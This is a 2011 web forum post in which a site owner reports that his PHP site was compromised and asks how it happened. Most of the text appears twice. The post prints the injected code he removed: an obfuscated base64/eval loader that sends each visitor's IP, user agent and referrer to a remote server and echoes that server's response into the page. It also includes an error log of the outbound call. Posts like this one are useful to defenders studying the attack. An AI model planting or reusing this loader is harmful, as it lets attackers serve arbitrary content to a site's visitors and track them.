13 Oct 11, 03:19AM
(This post was last modified: 13 Oct 11, 06:01AM by Ronald_Reagan.)
Hey, today pbclan.tk was having some issues. I use PHP for my main site files, this is so I can edit the sidebar easily (I hate frames) by just using one function, and so I can track (easily) who hits what pages. The most major PHP/other script on my website is the forums, which I keep updated. MyBB (same as here).
My problem stemmed from errors like this: (xx ip was from the other site, yy was mine. Obscured so no spider picks these up)
I looked, and found this on line 44, however I didn't see this till I scrolled over as it was obscured by tons of whitespace (spaces or tabs, I dont recall)
This would obviously throw the error, except how did this get into my file? I never added this in by myself, you can scan the site, there is no user data submission that seems like it could damage anything.
There were three lines like this in here, all removed now.
Thoughts on how this got in here? Google flagged this page as malicious, same with avast.
Should I talk to my host? Should I reexamine my security?
As I mentioned previously, I kept access logs examining who went where on my site. If needbe, I can hand these logs over. Of course, only those who I trust and who can help me.
Update: Got to the forums, now taking the whole site offline.
Update2: Got something similar related to MyBB and the current version: http://community.mybb.com/thread-105752.html
My problem stemmed from errors like this: (xx ip was from the other site, yy was mine. Obscured so no spider picks these up)
[SELECT ALL] Code:
[12-Oct-2011 15:55:53] PHP Warning: file_get_contents(http://xx.xxx.xxx.xx/bt.php?ip=yy.yyy.yy.yyy&host=pbclan.tk&uri=%2F&ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10_7_1%29+applewebkit%2F535.1+%28khtml%2C+like+gecko%29+chrome%2F14.0.835.202+safari%2F535.1&ref=) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
in /home/pbclan/public_html/index.php on line 44I looked, and found this on line 44, however I didn't see this till I scrolled over as it was obscured by tons of whitespace (spaces or tabs, I dont recall)
[SELECT ALL] Code:
?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>There were three lines like this in here, all removed now.
Thoughts on how this got in here? Google flagged this page as malicious, same with avast.
Should I talk to my host? Should I reexamine my security?
As I mentioned previously, I kept access logs examining who went where on my site. If needbe, I can hand these logs over. Of course, only those who I trust and who can help me.
Update: Got to the forums, now taking the whole site offline.
Update2: Got something similar related to MyBB and the current version: http://community.mybb.com/thread-105752.html